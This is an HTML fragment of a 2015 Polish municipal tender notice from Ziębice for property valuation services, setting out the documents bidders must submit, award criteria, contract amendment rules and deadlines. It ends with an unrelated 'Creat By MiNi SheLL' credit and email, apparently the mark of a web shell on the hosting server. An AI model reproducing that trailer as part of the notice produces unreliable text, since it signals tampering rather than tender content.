<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Pełnomocnictwo w oryginale bądź kopii potwierdzonej notarialnie do reprezentowania, o ile ofertę składa pełnomocnik;
2)	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia , zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania                          mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
Pisemne zobowiązanie innych podmiotów należy złożyć w oryginale lub kopii poświadczonej notarialnie za zgodność z oryginałem na zał. 8 do SIWZ  
a)	Jeżeli Wykonawca, polega na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia  innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów przedstawia również dokument zawierający:
-	jaki jest  zakres dostępnych Wykonawcy zasobów innego podmiotu, 
-	jaki jest sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy  wykonywaniu zamówienia,
-	jaki jest charakter stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, 
-	jaki jest zakres i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
Dokument winien być podpisany przez obie strony.

Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z ust. 2b, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie zasobów nie ponosi winy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin płatności - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej:
1)	w przypadku urzędowej zmiany stawki podatku od towarów i usług VAT. Należny podatek VAT naliczony zostanie od ceny netto w fakturze  wg.  stawki zgodnej z obowiązującym prawem w dniu wystawienia faktury, co nie dotyczy przypadków objęcia Wykonawcy, który w dniu podpisania umowy nie był płatnikiem VAT,  obowiązkiem podatkowym w zakresie tego podatku;
2)	zmiany w zakresie podwykonawcy, na którego zasoby powoływał się Wykonawca na zasadach określonych w art. 26 ust. 2b ustawy Pzp:
a)	jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu,
o których mowa w art. 22 ust. 1, Wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia;
3)	zmiana podwykonawcy w przypadkach innych niż określone w ppkt 2):
a)	zmiana polegająca na wskazaniu innych Podwykonawców;
b)	zmiana w zakresie rezygnacji  z Podwykonawców;
c)	zmiana polegająca na wskazaniu innego zakresu (części) Podwykonawstwa;
d)	zmiana polegająca na wykonaniu zamówienia przy pomocy Podwykonawców pomimo niewskazania w ofercie żadnej części zamówienia przeznaczonej            do wykonania w ramach Podwykonawstwa; 
4)	zmianę osób zdolnych do wykonania zamówienia pod warunkiem, że nowa osoba będzie posiadała uprawnienia zawodowe w zakresie szacowania nieruchomości oraz uzyskała wpis do centralnego rejestru rzeczoznawców majątkowych zgodnie z przepisami ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami dział V (t.j.: Dz. U. z 2014 r. poz. 518 z późn.zm.) oraz Wykonawca złoży oświadczenie, iż osoba, które będzie uczestniczyć w wykonaniu zamówienia posiada uprawnienia zawodowe w zakresie szacowania nieruchomości oraz uzyskała wpis do centralnego rejestru rzeczoznawców majątkowych zgodnie z przepisami ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami dział V (t.j.: Dz. U. z 2014 r. poz. 518 z późn. zm.);
5)	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w zakresie zmiany terminu realizacji odrębnych zleceń w sytuacjach uzasadniających szczególnie skomplikowanym charakterem usługi z przyczyn technicznych
lub spowodowanych warunkami atmosferycznymi uniemożliwiającymi przeprowadzenie rzetelnych oględzin wycenianej lub inwentaryzowanej nieruchomości lub wstrzymania realizacji zlecenia jako następstwa działania osób trzecich w szczególności ich nieobecności lub nieodbierania powiadomień od Wykonawcy; 
2.	Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 
4.	Zmiana umowy może nastąpić na pisemny umotywowany wniosek jednej ze stron, za zgodą drugiej strony umowy, na podstawie aneksu do umowy.
5.	Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności.
6.	Nie stanowi zmiany umowy w rozumieniu art. 144 Pzp:
1)	zmiana danych teleadresowych, 
2)	zmiana   liczby   poszczególnych   usług   z   zastrzeżeniem,  że  zmiana  ta  nie spowoduje podwyższenia wynagrodzenia całkowitego Wykonawcy, a wykonanie niniejszych usług jest  przedmiotem umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ziebice.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ziębicach ul. Przemysłowa 10, 57-220 Ziębice (pokój nr 20b- II piętro)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2015 godzina 10:00, miejsce: Urząd Miejski w Ziębicach ul. Przemysłowa 10, 57-220 Ziębice (pokój nr 10 sekretariat - I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. ZAMAWIAJĄCY NIE PRZEWIDUJE ZAWARCIA UMOWY RAMOWEJ.
2. ROZLICZENIA BĘDĄ PROWADZONE W WALUCIE PLN.
3. ZAMAWIAJĄCY NIE PRZEWIDUJE AUKCJI ELEKTRONICZNEJ.
4. ZAMAWIAJĄCY NIE PRZEWIDUJE WYMAGAŃ, O KTÓRYCH MOWA W ART. 29 UST. 4 USTAWY PZP.
5.	INFORMACJA DOTYCZĄCA UDZIAŁU PODWYKONAWCÓW W PRZEDMIOCIE ZAMÓWIENIA.
Wykonawca może powierzyć wykonanie części zamówienia Podwykonawcy 
Przez umowę o Podwykonawstwo należy rozumieć - umowę w formie pisemnej     o charakterze odpłatnym, której przedmiotem są usługi, dostawy  stanowiące część zamówienia publicznego, zawartą między wybranym przez Zamawiającego Wykonawcą  a innym podmiotem (Podwykonawcą).
1)	Wykonawca może powierzyć wykonanie części zamówienia Podwykonawcy. 
2)	Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, którą zamierza powierzyć Podwykonawcom. W przypadku braku takiego oświadczenia Zamawiający uzna, iż Wykonawca będzie realizował zamówienie bez udziału Podwykonawców.
3)	Wskazanie w ofercie części zamówienia, której wykonanie Wykonawca powierzy Podwykonawcom, winno nastąpić poprzez określenie jej rodzaju i zakresu.
6. OTWARCIE OFERT NASTĄPI W DNIU 28 MAJA 2015 ROKU O  GODZ. 10:30 W SIEDZIBIE ZAMAWIAJĄCEGO TJ. W URZĘDZIE MIEJSKIM W ZIĘBICACH PRZY UL. PRZEMYSŁOWEJ 10 W ZIĘBICACH, W POKOJU NR 2 (SALA NARAD),.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com